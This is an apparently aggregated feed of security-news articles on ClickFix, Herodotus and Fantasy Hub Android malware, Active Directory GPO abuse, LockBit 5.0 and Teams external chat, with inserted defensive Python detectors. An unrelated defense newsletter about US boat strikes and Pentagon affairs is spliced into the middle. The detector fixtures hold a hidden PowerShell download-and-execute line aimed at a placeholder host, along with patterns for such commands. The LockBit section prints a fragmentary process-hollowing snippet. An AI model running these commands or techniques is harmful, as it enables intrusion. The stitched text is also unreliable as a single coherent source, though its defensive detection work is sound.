ClickFix attacks have experienced a dramatic surge over the past year, establishing themselves as a cornerstone of modern social engineering tactics.
These sophisticated attacks manipulate victims into executing malicious code directly on their devices through deceptive copy-and-paste mechanisms.
The threat has evolved beyond traditional email-based phishing, now leveraging multiple delivery channels including poisoned search results and malicious advertising campaigns that bypass conventional security controls.
The latest iteration of ClickFix represents a significant escalation in sophistication. Attackers have developed highly convincing fake verification pages that mimic legitimate services like Cloudflare, complete with embedded instructional videos, countdown timers, and real-time user counters.
These elements work together to create an authentic appearance that pressures victims into completing the verification process without suspicion.
The pages adapt dynamically to the user’s operating system, delivering platform-specific instructions for Windows, Mac, and other systems.
Push Security researchers identified this advanced campaign as the most sophisticated ClickFix variant observed to date.
The attack chain demonstrates remarkable technical complexity, automatically copying malicious code to the victim’s clipboard through JavaScript without requiring manual selection.
According to Microsoft’s 2025 Digital Defense report, ClickFix attacks now account for 47% of all initial access methods, making them the most prevalent entry point for cybercriminals targeting organizations.
The primary delivery mechanism has shifted dramatically away from email. Research shows that four out of five ClickFix pages are accessed through Google Search, either via poisoned search results or malvertising campaigns.
Attackers compromise legitimate websites through hosting vulnerabilities or create optimized malicious sites targeting specific search terms.
This non-email delivery approach effectively bypasses traditional anti-phishing controls implemented at the email gateway layer.
Detection evasion techniques employed by ClickFix campaigns include domain rotation to avoid blocklists, bot protection services that prevent automated analysis, and heavily obfuscated page content designed to evade signature-based detection systems.
Because malicious code is copied within the browser sandbox, security tools cannot observe or flag the action before execution, leaving endpoint detection and response systems as the sole remaining defense layer after victims attempt to run the commands.
The technical execution of ClickFix payloads demonstrates increasing sophistication in abusing legitimate system binaries across operating systems.
While mshta and PowerShell remain the predominant attack vectors, threat actors now exploit a diverse array of Living-Off-The-Land Binaries (LOLBINs) targeting different services.
Recent variants employ cache smuggling techniques that combine ClickFix methodology with JavaScript to cache malicious files disguised as JPG images, enabling local execution without external PowerShell web requests.
The attack operates through user-initiated paste events requiring interaction such as button presses before loading the malicious payload, making traditional clipboard blocking measures ineffective.
Security researchers have noted that disabling the Win+R dialog box or restricting File Explorer address bar applications provides limited protection since attackers can leverage alternative legitimate services to execute commands.
The hybrid attack path bridging browser and endpoint environments positions ClickFix to potentially evolve into entirely browser-based attacks that completely evade EDR solutions, representing a concerning future trajectory for this threat vector.
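The article leaves endpoint telemetry as the last place where a pasted ClickFix command can be caught, so it is worth showing what that check looks like. The following is an added example, not code from the article or from Push Security: it scores constructed process-creation records for the pattern described above (PowerShell or mshta launched from Explorer with a command line that fetches and runs remote content). The field names, the weights, the threshold and the sample records are assumptions.

```python
# Added example (not from the article or Push Security): a heuristic scorer for
# ClickFix-style executions over constructed process-creation records.
# Field names, weights and the sample records are assumptions.
import re
from dataclasses import dataclass

# Binaries the article names as the predominant ClickFix vectors.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe"}
# Parent typical of a one-liner pasted into Win+R or the Explorer address bar.
PASTE_PARENTS = {"explorer.exe"}
# Command-line traits of a pasted one-liner that fetches and runs remote content.
SUSPICIOUS = [
    re.compile(r"(?i)-w(indowstyle)?\s+hid"),                          # hidden window
    re.compile(r"(?i)-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"),    # base64-encoded command
    re.compile(r"(?i)\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b"),
    re.compile(r"(?i)\bmshta(\.exe)?\s+[\"']?https?://"),              # mshta fetching a remote HTA
    re.compile(r"(?i)\biex\b|invoke-expression"),
]

@dataclass
class ProcessEvent:
    parent: str
    image: str
    cmdline: str

def score(ev: ProcessEvent) -> int:
    """0 for anything but the named binaries; otherwise parent pairing plus command-line hits."""
    if ev.image.lower() not in LOLBINS:
        return 0
    s = 2 if ev.parent.lower() in PASTE_PARENTS else 0
    s += sum(1 for pat in SUSPICIOUS if pat.search(ev.cmdline))
    return s

def flag(events, threshold: int = 3):
    """Events at or above the threshold; the threshold is a tuning assumption."""
    return [ev for ev in events if score(ev) >= threshold]

# Constructed sample telemetry (not real indicators).
SAMPLE = [
    ProcessEvent("explorer.exe", "powershell.exe",
                 'powershell -w hidden -c "iex (iwr http://example.invalid/v)"'),
    ProcessEvent("explorer.exe", "mshta.exe", "mshta http://example.invalid/verify.hta"),
    ProcessEvent("svchost.exe", "powershell.exe",
                 "powershell -ExecutionPolicy Bypass -File C:\\ProgramData\\Inventory\\collect.ps1"),
    ProcessEvent("explorer.exe", "notepad.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for ev in flag(SAMPLE):
        print(score(ev), ev.parent, "->", ev.cmdline)
```

The parent/child pairing carries more weight than any single command-line trait because the article's point is that the user, not a script host or management tool, launches the binary; the scheduled-task style PowerShell in the third record scores zero for that reason. Tune the weights against your own telemetry before relying on the threshold.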
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post ClickFix Attacks Evolved With Weaponized Videos That Tricks Users via Self-infection Process appeared first on Cyber Security News.
A sophisticated banking trojan named Herodotus has emerged as a significant threat to Android users worldwide.
Operating as Malware-as-a-Service, this malicious application disguises itself as a legitimate tool to trick users into downloading and installing an APK file outside the official Play Store.
Once installed on a device, the trojan gains access to critical system permissions and can execute banking operations directly on behalf of the compromised user.
The threat represents a concerning evolution in mobile malware, particularly because it remains largely invisible to traditional antivirus solutions despite its obvious malicious intent.
The malware spreads primarily through SMS phishing campaigns, with attackers sending deceptive links that direct victims to fraudulent download pages.
Users unknowingly install the APK, granting Herodotus access to sensitive permissions including accessibility features.
Pradeo security analysts identified that the trojan then deploys overlay attacks by displaying fake screens on top of legitimate banking applications, enabling credential theft and session hijacking.
Herodotus employs sophisticated evasion tactics specifically designed to bypass modern anti-fraud detection systems.
The malware “humanizes” its malicious actions through deliberate random delays, micro-movements, and realistic typing patterns.
This behavioral approach makes automated detection significantly more challenging.
The trojan captures both screen content and keystroke data, allowing attackers to monitor user activity in real time and perform transactions while the victim remains logged into their banking session.
Pradeo security analysts noted that when they searched for Herodotus samples in a leading antivirus provider’s signature database, the application triggered no alerts whatsoever.
This failure occurred despite the malware being easily identifiable through basic search engine queries. Traditional antivirus solutions typically rely on known signatures and previously observed behavioral patterns.
Herodotus circumvents these defenses because it operates through SMS phishing (an initial access vector), installs from unknown sources, and only triggers dangerous activities after receiving explicit permission approvals from the user.
Effective defense requires detecting multiple indicators of compromise working in sequence: suspicious SMS links, installations from untrusted sources, critical permission requests, and behavioral anomalies including screen overlays and simulated interactions.
Individually, these signals may appear harmless, but their combination reveals an active attack that conventional antivirus protection consistently misses.
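The sequence the article describes can be correlated in order rather than alerting on any one signal. The following is an added example, not Pradeo's detection logic: it walks constructed device-event lines and reports devices that pass every stage of the chain, in order, within a 24-hour window. The event type names, the line format and the window are assumptions.

```python
# Added example (not Pradeo's detection logic): correlate the indicators the
# article lists into an ordered chain over constructed device-event lines.
# Event type names, the line format and the 24-hour window are assumptions.
from datetime import datetime, timedelta

# Stages in the order the article describes them; each stage is satisfied by
# any one of its event types.
CHAIN = [
    {"sms_link_opened"},
    {"apk_installed_unknown_source"},
    {"accessibility_service_enabled", "critical_permission_granted"},
    {"overlay_displayed", "simulated_input"},
]

def parse(line: str):
    """Parse '<ISO time> <device> <event>' (constructed format)."""
    ts, device, event = line.split(" ", 2)
    return datetime.fromisoformat(ts), device, event.strip()

def correlate(lines, window: timedelta = timedelta(hours=24)):
    """Return {device: completion time} for devices that pass every stage, in order, within the window.

    Events that do not match the device's current stage are ignored, so an
    overlay seen before any install does not advance the chain by itself.
    """
    progress = {}  # device -> (next stage index, time of the stage-0 event)
    hits = {}
    for ts, device, event in sorted(parse(ln) for ln in lines if ln.strip()):
        stage, start = progress.get(device, (0, ts))
        if stage and ts - start > window:
            stage, start = 0, ts  # chain went stale; look for a fresh start
        if event in CHAIN[stage]:
            if stage == 0:
                start = ts
            stage += 1
            if stage == len(CHAIN):
                hits[device] = ts
                stage = 0
        progress[device] = (stage, start)
    return hits

# Constructed sample events (not real telemetry).
SAMPLE = """
2025-10-28T09:00:00 dev-A sms_link_opened
2025-10-28T09:03:00 dev-A apk_installed_unknown_source
2025-10-28T09:05:00 dev-A accessibility_service_enabled
2025-10-28T09:40:00 dev-A overlay_displayed
2025-10-28T10:00:00 dev-B apk_installed_unknown_source
2025-10-28T10:02:00 dev-B critical_permission_granted
2025-10-28T10:05:00 dev-B overlay_displayed
2025-10-28T11:00:00 dev-C sms_link_opened
2025-10-30T08:00:00 dev-C apk_installed_unknown_source
""".strip().splitlines()

if __name__ == "__main__":
    for device, when in correlate(SAMPLE).items():
        print(f"{device}: chain completed at {when.isoformat()}")
```

Only dev-A completes the chain: dev-B never shows the SMS link that starts it, and dev-C's install arrives two days after the link, outside the window. Whether a chain that skips the SMS stage (a sideloaded APK from another source) should still alert is a policy choice for the reader's environment.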
The post Herodotus Android Banking Malware Takes Full Control Of Device Evading Antivirus appeared first on Cyber Security News.
Active Directory sites are designed to optimize network performance across geographically separated organizations by managing replication and authentication across multiple locations.
The Synacktiv security researchers have demonstrated that these supposedly safe network management tools can be weaponized to launch powerful attacks against enterprise environments.
The vulnerability emerges because Active Directory sites can be linked to Group Policy Objects (GPOs), which control system configurations across an organization.
When attackers gain write permissions to sites or their associated GPOs, they can inject malicious configurations that compromise all computers connected to those sites, including domain controllers.
This creates a direct pathway to domain-wide compromise without triggering conventional security defenses.
Attackers exploit three primary permission types to accomplish this: GenericAll, GenericWrite, and WriteGPLink permissions on site objects. Even administrators often delegate these permissions without fully understanding the implications.
Once an attacker controls these permissions, they can either poison existing GPOs or create new malicious ones that execute arbitrary commands on connected systems.

These commands can add attacker-controlled accounts to administrator groups, effectively giving them domain admin privileges within minutes. The most dangerous aspect is how Active Directory sites enable lateral movement across entire forests.
The configuration partition containing site information replicates forest-wide, meaning that a compromised domain controller can modify site configurations that affect other domains.

This technique bypasses traditional SID filtering protections that normally prevent such cross-domain attacks.
The Synacktiv researchers demonstrated that attackers from a child domain can compromise the forest root domain by simply linking malicious GPOs to sites that host the root domain’s controllers.
This attack vector represents a significant blind spot in many organizations’ security strategies. It warrants immediate attention from defensive teams managing large Active Directory environments.
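Defenders can review both halves of this exposure from exported directory data: what is linked to each site, and who can change it. The following is an added example, not Synacktiv's tooling: it parses gPLink values in the attribute's bracket encoding and triages site ACEs for the three rights named above. The site names, GPO GUIDs, principals and ACE records are constructed placeholders.

```python
# Added example (not Synacktiv's tooling): audit site objects from exported
# directory data. gPLink parsing follows the attribute's bracket encoding;
# the site names, GPO GUIDs, principals and ACEs below are constructed.
import re

# One gPLink value is a run of "[LDAP://<GPO DN>;<options>]" entries.
GPLINK_RE = re.compile(r"\[LDAP://([^;\]]+);(\d+)\]", re.IGNORECASE)
LINK_DISABLED = 1  # option bit: link present but disabled
LINK_ENFORCED = 2  # option bit: link enforced (cannot be blocked below)

def parse_gplink(value: str):
    """Return [(gpo_dn, enabled, enforced), ...] in link order."""
    links = []
    for dn, opts in GPLINK_RE.findall(value or ""):
        o = int(opts)
        links.append((dn, not (o & LINK_DISABLED), bool(o & LINK_ENFORCED)))
    return links

# Rights the article names as sufficient to abuse a site object.
DANGEROUS_RIGHTS = {"GenericAll", "GenericWrite", "WriteGPLink"}
# Principals expected to hold them; any other holder is worth a look.
EXPECTED = {"Domain Admins", "Enterprise Admins", "SYSTEM"}

def risky_aces(aces):
    """aces: iterable of (site, principal, right). Return unexpected holders of dangerous rights."""
    return [(site, who, right) for site, who, right in aces
            if right in DANGEROUS_RIGHTS and who not in EXPECTED]

# Constructed export: site -> raw gPLink value (GUIDs are placeholders).
SITES = {
    "HQ": "[LDAP://cn={11111111-1111-1111-1111-111111111111},cn=policies,cn=system,DC=corp,DC=example;0]"
          "[LDAP://cn={22222222-2222-2222-2222-222222222222},cn=policies,cn=system,DC=corp,DC=example;2]",
    "Branch": "[LDAP://cn={33333333-3333-3333-3333-333333333333},cn=policies,cn=system,DC=corp,DC=example;1]",
    "DC-Site": "",
}
# Constructed ACE export: (site, principal, right).
ACES = [
    ("HQ", "Domain Admins", "GenericAll"),
    ("HQ", "CORP\\helpdesk-ops", "WriteGPLink"),
    ("Branch", "CORP\\site-mgmt", "GenericWrite"),
    ("Branch", "CORP\\site-mgmt", "ReadProperty"),
    ("DC-Site", "Enterprise Admins", "GenericAll"),
]

def report():
    """Links per site plus the ACEs a defender should review."""
    links = {site: parse_gplink(raw) for site, raw in SITES.items()}
    return links, risky_aces(ACES)

if __name__ == "__main__":
    links, risky = report()
    for site, entries in links.items():
        for dn, enabled, enforced in entries:
            print(f"{site}: {dn} enabled={enabled} enforced={enforced}")
    for site, who, right in risky:
        print(f"REVIEW {site}: {who} holds {right}")
```

Feeding this from a real environment means exporting the gPLink attribute and the security descriptor of each object under the Sites container of the configuration partition; because that partition replicates forest-wide, the review should cover every domain's delegations, not only the one the auditor sits in.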
The post Hackers Can Attack Active Directory Sites to Escalate Privileges and Compromise the Domain appeared first on Cyber Security News.
This means the U.S. military has killed more than 60 people in at least 17 strikes, according to information shared by Hegseth and President Trump dating to when these strikes began in early September. (Want more information on each of the prior 16 strikes? Just Security has that covered, here.)
Due process? As we’ve noted before, Hegseth did not provide evidence to support the claim that those in the boat were trafficking drugs, where they were headed, nor—on a more trivial level—how the secretary’s subordinates determined the gender of those on the vessel before the attack.
However, the Associated Press looked into “the identities of four of the men—and pieced together details about at least five others” killed by U.S. troops, reporting Friday from Venezuela. “One was a fisherman struggling to eke out a living on $100 a month. Another was a career criminal. A third was a former military cadet. And a fourth was a down-on-his-luck bus driver.”
“Most of the nine men were crewing such craft for the first or second time, making at least $500 per trip…One was a well-known local crime boss who contracted out his smuggling services to traffickers,” AP’s Regina Garcia Cana writes. “We talked with several people in multiple communities who knew the men at different stages of their lives. We used social media posts and publicly available information to corroborate some of the information,” she said in a brief, separate report about her investigative process.
New: The U.S. military began operating an AC-130J Ghostrider attack plane out of El Salvador in mid-October, the New York Times reported Thursday. “It is operated by the Air Force Special Operations Command, a unit that carries out sensitive missions for the military.”
But that’s not all: “The New York Times also identified a Navy [P-8A Poseidon] reconnaissance plane and a rarely seen, unmarked Air Force [C-40 Clipper] jet at the airport,” located in the Cooperative Security Location Comalapa, a small American military outpost at El Salvador’s main airport. More, here.
Update: When it comes to Venezuela, the White House told Congress it “doesn’t have a legal justification that would support attacks against any land targets right now,” and that “the US is not currently planning to launch strikes inside Venezuela” at the moment, CNN reported Thursday.
Notable: The White House’s legal framework “includes a list of 24 different cartels and criminal organizations based around Latin America it says the administration is authorized to target, according to one of the sources familiar with the document. But the Trump administration is seeking a separate legal opinion from the Justice Department that would provide a justification for launching strikes against land targets without needing to ask Congress to authorize military force,” according to five CNN reporters.
By the way, Senate Republicans on Thursday voted down legislation that would have limited White House attacks inside Venezuela. “The joint resolution, which was introduced by Sen. Tim Kaine (D-Va.) last month, was quelled in a 49-51 Senate vote,” The Hill reports.
Some Republicans wanted to have it both ways: Indiana’s Todd Young voted against the measure, then said afterward that his vote was “not an endorsement of the Administration’s current course in the Caribbean and Eastern Pacific.” North Carolina’s Thom Tillis acted similarly Thursday, voting against the measure, then later telling reporters “he still has doubts about the campaign,” according to AP. Tillis also “pointed out that it was expensive to change the deployment location for an aircraft carrier and questioned whether those funds could be better used at the U.S.-Mexico border to stop fentanyl trafficking.”
Democrats dissent: “You cannot bomb your way out of a drug crisis,” Sen. Jack Reed, D-R.I., told reporters, while Virginia’s Tim Kaine, who co-authored the legislation voted down Thursday, said, “We should not be going to war without a vote of Congress.”
Bigger picture: Why Venezuela? Four writers at The Atlantic took a stab at the question, featuring input from anonymous White House sources and Ryan Berg, an expert on the region who now works at the Center for Strategic and International Studies in Washington. According to Berg, “Trump instinctively understands that if the U.S. is not the top dog in the Western Hemisphere, it can’t be an effective global power.” A senior administration official added, “If the goal is increasingly to have U.S.-aligned leaders, or at a minimum leaders that are not actively aligned with China, Russia, and Iran, then Venezuela sticks out like a sore thumb.”
Trump himself said six years ago in Miami, “When Venezuela is free, and Cuba is free, and Nicaragua is free, this will become the first free hemisphere in all of human history.”
Also notable: “Trump has a history of deploying deception in his dealings with foreign adversaries,” the four reporters caution, and note that “In June, the White House announced that he would give Tehran two additional weeks to engage in diplomacy about its nuclear program; three days later, Trump sent warplanes far into Iranian airspace to bomb atomic facilities. He may be employing a similar tactic with Venezuela.” Continue reading, here.
Welcome to this Friday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Ben Watson with Thomas Novelly and Bradley Peniston. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. On this day in 1983, NATO began its large-scale Able Archer 83 exercises, which the Soviets interpreted as possible opening moves in a nuclear war with the alliance.
Today, 2 pm ET: Hegseth’s “Arsenal of Freedom” speech at the National Defense University. A Pentagon press release said it would be livestreamed at war.gov, but as of press time, the “Live Events” page had nothing scheduled. Defense One’s Lauren C. Williams is heading to NDU to cover it; look for her story later today.
ICYMI: Experts, officials, industry reacted to a six-page draft of a memo expected to be released after the speech. And here’s a draft list of industry CEOs slated to attend.
Related: Defense tech companies will weather the shutdown. But what happens next? “From DOGE’s initial descent to the longest government shutdown in U.S. history, defense contractors are weathering policy changes at different rates during the first leg of the second Trump administration. But while larger companies are thriving, smaller companies—the very ones the White House and Pentagon want to court—have a bumpier ride,” Williams reports off recent earning calls and more.
Commentary: As it seeks to improve acquisition, the Pentagon should do more with MOSA—that is, modular open systems architecture. “The law already requires MOSA to be used in major warfighting programs ‘to the maximum extent practicable’ and Secretary Hegseth’s own Systems Engineering and Architecture office has been pushing the approach since February,” writes Andy Green, who leads the Mission Systems division of HII, the nation’s largest warship builder. “It is direction that, if enforced, could do more to speed acquisitions and cut costs than any process reform under consideration.” Read his argument, here.
Pentagon policy shop shifts story on pause in Ukraine aid again. “A senior advisor and former deputy to the Pentagon’s undersecretary for policy told senators on Thursday that his office ‘neither ordered nor even recommended a pause to any weapons shipments to Ukraine’ over the summer, contrary to the press reporting from the time, but also in contrast to testimony from his colleague on Tuesday and statements from the Pentagon on July 2,” writes Defense One’s Meghann Myers, here.
ICYMI: It’s been a rough week for would-be Pentagon policymakers on the Hill. On Tuesday, Sen. Tom Cotton, R-Ark., said the office was producing a “Pigpen-like mess.”
Developing: A federal judge is set to rule later today on Trump's order to send National Guard troops to Portland, Oregon, which the president has claimed is a “war-ravaged” city due to persistent but largely peaceful protests outside an immigration detention facility at the southern end of the city.
Why it matters: The judge’s decision “could be the first to permanently block Trump from using troops to quell protests against federal immigration authorities, which he is also attempting to do in Democrat-led Los Angeles, Chicago and Washington D.C.,” Reuters reports, and notes, “The case could ultimately go to the U.S. Supreme Court.”
For a bit more background on the case, Oregon Public Broadcasting has this from Sunday.
Update: The cost to dispatch about 200 Texas Guard troops to Chicago (against the wishes of state officials) could rise above $12 million by December, the San Antonio Express-News reported Thursday. Even though the Texas soldiers are already staged in Illinois, “a court order issued nearly a month ago has blocked them from deploying to the streets or guarding a Chicago-area immigration facility,” the Express-News reminds readers. “In the meantime, [Northern Command officials say] the troops are training on deescalation, crowd control and use-of-force rules.”
Related: “Michigan National Guard chief: No troops needed in Detroit.”
Newly confirmed Air Force Chief of Staff Gen. Kenneth Wilsbach is getting the band back together. The four-star general has selected Chief Master Sgt. David Wolfe as the service's next top-enlisted leader, Defense One’s Thomas Novelly reports. Previously, Wolfe was Wilsbach's top enlisted advisor when the general led Air Combat Command.
Wolfe takes over the role from Chief Master Sgt. David Flosi, who announced his retirement last month following the death of his wife Katy. The service's new top enlisted leader began his military career in 1992 with a background in missile security, elite guard duty, protective services, and space warning security. In an August press release, Wolfe also detailed he received non-judicial punishment early in his Air Force career.
“I didn't exactly start my Air Force career on the right foot,” Wolfe said in the news release. “An Article 15 and a stint in correctional custody made it clear I needed to change course. It was a rough start, but it turned out to be exactly what I needed.”
Space Force astronauts? “Today, guardians go to space only in popular misconception, but tomorrow?” There might be solid tactical reasons to put Space Force personnel in orbit, argues a new report from the Mitchell Institute for Aerospace Studies, writes Defense One’s Thomas Novelly, here.
Additional reading:
At the president’s order, the Pentagon is drawing up plans for war in Nigeria even though military officials told the New York Times this week “U.S. forces are unlikely to be able to end a decades-long insurgency that has claimed lives across sectarian lines in Africa’s most populous country.”
Courses of action with the presumed highest likelihood of success include drone strikes “on the few known compounds in northern Nigeria inhabited by militant groups” and joint operations “with Nigerian soldiers to raid…rural hamlets in the country’s north,” Helene Cooper reported Wednesday.
A third and more serious option involves “mov[ing] an aircraft carrier group into the Gulf of Guinea” for a campaign of “strikes deep in northern Nigeria” using fighter jets and long-range bombers. Continue reading, here.
From the region: “Russia could buy leftover uranium from Niger, France warns,” Semafor reported Friday.
And lastly this week: China’s third aircraft carrier just entered service during a ceremony at Yulin Naval Base on Wednesday. However, “security analysts and regional diplomats say tough challenges lie ahead before it can be made fully operational,” Reuters reported Friday from Hong Kong.
It’s an 80,000-ton, diesel-fueled carrier named CS Fujian, and it “brings catapult-launch capabilities to Chinese naval aviation,” USNI News explains. “The first two PLAN carriers, CS Liaoning (016) and Shandong (017), used Russian-styled short take-off but arrested recovery (STOBAR) designs. [But now] With the vessel’s three electromagnetic catapults, Chinese forces can sortie fighter jets with heavier payloads and larger aircraft—including the new KJ-600 airborne early warning and command aircraft.”
In recent sea trials, “the Chinese navy launched its new carrier version of the J-35 stealth fighter and an early-warning aircraft, the KJ-600, as well as a variant of its established J-15 fighter,” Reuters reports.
Expert reax: “Despite nine sea trials this year, they are working with almost entirely new platforms top to bottom,” which is why “I think it will be at least another year before it reaches full operational capability,” said Ben Lewis, of the open-source data platform PLATracker.
LockBit 5.0 made its debut in late September 2025, marking a significant upgrade for one of the most notorious ransomware-as-a-service (RaaS) groups.
With roots tracing back to the ABCD ransomware in 2019, LockBit rapidly grew in sophistication, consistently updating its tactics despite facing aggressive law enforcement efforts and affiliate panel leaks.
The latest version is built on the existing v4.0 codebase, yet it introduces new methods designed to maximize evasion and destructive impact across diverse organizational networks.
Flashpoint security analysts identified LockBit 5.0’s uniquely modular architecture as a notable innovation in the ransomware’s ongoing evolution.
Their detailed technical analysis highlights how this malware continues to threaten critical infrastructure by leveraging advanced execution and obfuscation strategies.
Large-scale attacks have been observed targeting industries irrespective of their geographic and operational boundaries, ensuring LockBit’s continued reputation for stealth and resilience.
One standout advancement in LockBit 5.0 is its two-stage execution model, which expertly divides the infection process into loader and payload phases.
The initial stage involves a stealthy loader built for persistence and anti-analysis, employing control flow obfuscation to dynamically calculate execution paths and complicate reverse engineering.
The loader dynamically resolves API calls using a hashing algorithm, then reloads fresh copies of core libraries—such as NTDLL and Kernel32—effectively bypassing hooks placed by security tools.
After creating a suspended instance of defrag.exe, it injects the decrypted payload through process hollowing, updating the instruction pointer with ZwWriteProcessMemory and resuming execution in memory, all while evading standard detection mechanisms.
// Process hollowing code snippet excerpt (the elided arguments are not on the page)
PROCESS_INFORMATION pi = {0};
// CreateProcess returns a BOOL and fills pi; the target is started suspended
CreateProcess("defrag.exe", ..., CREATE_SUSPENDED, ..., &pi);
ZwWriteProcessMemory(pi.hProcess, ...); // Inject LockBit payload
ResumeThread(pi.hThread);               // takes the thread handle, not the process handle
This technical breakdown demonstrates LockBit’s commitment to maximizing operational stealth and survivability.
The post New Analysis Uncovers LockBit 5.0 Key Capabilities and Two-Stage Execution Model appeared first on Cyber Security News.
Russian-based threat actors are distributing a sophisticated Android Remote Access Trojan through underground channels, offering it as a subscription service to other criminals.
The malware, identified as Fantasy Hub, enables attackers to conduct widespread surveillance operations on compromised mobile devices, stealing sensitive communications and personal information from unsuspecting users.
The spyware’s capabilities extend far beyond basic data theft, providing attackers with tools to intercept two-factor authentication messages, access banking credentials, and perform real-time device monitoring.
Fantasy Hub operates under a Malware-as-a-Service model, significantly lowering the technical barriers for attackers with minimal expertise.
Threat actors advertise the malware on Russian-language channels and include links to a Telegram bot that manages subscriptions and provides access to the malware builder.
The attackers refer to compromised devices and their owners as “mammoths,” drawing users into a sophisticated social engineering ecosystem that combines phishing techniques with technical sophistication.
Attackers receive complete documentation, including video tutorials, on deploying the malware and bypassing security restrictions.
Zimperium security researchers identified Fantasy Hub’s sophisticated infrastructure, which includes a Russian-language command and control panel and comprehensive operational guides for attackers.
The malware’s targeting strategy specifically focuses on financial institutions such as Alfa, PSB, Tbank, and Sber, where operators deploy fake login windows to capture banking credentials.
This financial focus underscores the serious threat posed to enterprise environments where employees use mobile banking or sensitive applications on personal devices.
Fantasy Hub employs advanced detection evasion tactics to remain hidden from security analysis.
The malware utilizes a native dropper embedded within a metamask_loader library that decrypts an encrypted asset called metadata.dat during runtime.
The decryption process relies on a custom XOR encryption routine using a fixed 36-byte key pattern, followed by gzip decompression through zlib.
This two-stage encryption approach significantly reduces static indicators that traditional antivirus solutions might detect.
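For an analyst who needs the payload rather than the dropper, the two stages described above are straightforward to reverse once the key has been pulled from the native library. The following is an added example, not Zimperium's tooling: it implements the repeating-key XOR followed by gzip decompression over a blob the script constructs itself. The 36-byte key, the payload and the blob are placeholders; the dropper's real key is not on the page.

```python
# Added example (not Zimperium's tooling): unpack the two stages the article
# describes, a repeating-key XOR followed by gzip decompression. The 36-byte
# key, the payload and the blob are constructed here; the dropper's real key
# is not on the page and would be recovered from the native library.
import gzip

KEY_LEN = 36
GZIP_MAGIC = b"\x1f\x8b"

def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data against the key cycled over its length (XOR is its own inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def key_fits(blob: bytes, key: bytes) -> bool:
    """Cheap triage for a candidate key: does un-XOR expose a gzip header?"""
    return xor_repeating(blob[:2], key[:2]) == GZIP_MAGIC

def unpack(blob: bytes, key: bytes) -> bytes:
    """Reverse the stages: un-XOR, check the gzip magic, then decompress."""
    if len(key) != KEY_LEN:
        raise ValueError(f"expected a {KEY_LEN}-byte key, got {len(key)}")
    if not key_fits(blob, key):
        raise ValueError("no gzip header after XOR: wrong key or not this scheme")
    return gzip.decompress(xor_repeating(blob, key))

def pack(payload: bytes, key: bytes) -> bytes:
    """Build a blob the way the scheme implies; only here to keep the example self-contained."""
    return xor_repeating(gzip.compress(payload), key)

# Constructed inputs (placeholders, not values from any sample).
SAMPLE_KEY = bytes(range(0x41, 0x41 + KEY_LEN))
SAMPLE_PAYLOAD = b'{"c2": "placeholder.invalid", "build": 1}'
SAMPLE_BLOB = pack(SAMPLE_PAYLOAD, SAMPLE_KEY)

if __name__ == "__main__":
    print(unpack(SAMPLE_BLOB, SAMPLE_KEY).decode())
```

The gzip magic check is the useful part when working on a real sample: the two-byte header is known plaintext, so a wrong candidate key fails immediately instead of producing a zlib error deep in decompression. Because only the first few header bytes are predictable, the check confirms a key but cannot recover all 36 bytes of one; that still has to come from the library.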
The malware further leverages the SMS handler role abuse technique, similar to ClayRat spyware, consolidating multiple powerful permissions including contacts, camera, and file access into a single authorization step.
The dropper masquerades as a Google Play Update to lower user suspicion, while recent samples demonstrate root detection capabilities to evade dynamic analysis environments.
Additionally, Fantasy Hub integrates WebRTC for establishing live audio and video streaming channels, enabling real-time surveillance capabilities that significantly expand the attacker’s reconnaissance potential beyond traditional data exfiltration methods.
The post New Android Malware ‘Fantasy Hub’ Intercepts SMS Messages, Contacts and Call Logs appeared first on Cyber Security News.
Microsoft’s upcoming Teams update, set for targeted releases in early November 2025 and worldwide by January 2026, will allow users to initiate chats with only an email address, even if the recipient isn’t a Teams user. This feature raises security concerns among experts.
The invitee joins as a guest via email, enabling seamless external communication across Android, desktop, iOS, Linux, and Mac. While aimed at flexible work, this default-enabled feature widens the door for phishing scams and malware infiltration, potentially leaking sensitive data in the process.
The core issue lies in the feature’s broad accessibility. By allowing chats with external email addresses without prior validation, Teams creates an enlarged attack vector.
Phishing actors could spoof legitimate invites, tricking users into clicking malicious links or sharing credentials. For instance, a fake “chat request” from a supposed business partner might embed malware payloads, exploiting the guest join process to deliver ransomware or spyware directly into organizational chats.
Security researchers warn that this mirrors tactics seen in OAuth phishing campaigns, where attackers impersonate trusted services to harvest data.
With chats governed by Entra B2B Guest policies but still confined to the organization’s boundary, the risk of inadvertent data exposure grows.
Employees might unknowingly disclose proprietary information to impostors, leading to intellectual property theft or compliance violations under regulations such as GDPR.
In practice, this could amplify threats in hybrid work environments. Consider a sales team chatting with a “prospective client” via email invite; if the contact is compromised, attackers gain a foothold to eavesdrop or escalate privileges.
Malware distribution becomes simpler, too, as guests could inadvertently forward infected files, bypassing traditional email filters, since interactions occur within Teams’ ecosystem.
Microsoft acknowledges the change affects all users and urges organizations to update documentation and train support teams. However, the default activation means many firms could overlook it until incidents occur, echoing past oversights like the SolarWinds breach, where unpatched features fueled widespread compromise.
Admins aren’t powerless. To disable the feature, they can use PowerShell to set the UseB2BInvitesToAddExternalUsers attribute in TeamsMessagingPolicy to false, effectively blocking external email-based chats.
This simple tweak restores tighter controls, limiting invites to verified B2B connections. Experts recommend combining it with multi-factor authentication enforcement, regular policy audits, and user awareness training to counter phishing attempts.
As Teams evolves, balancing innovation with security remains crucial. This rollout underscores the need for proactive defense in collaborative tools, lest convenience become a cybercriminal’s gateway.
The post Microsoft Teams’ New “Chat with Anyone” Feature Exposes Users to Phishing and Malware Attacks appeared first on Cyber Security News.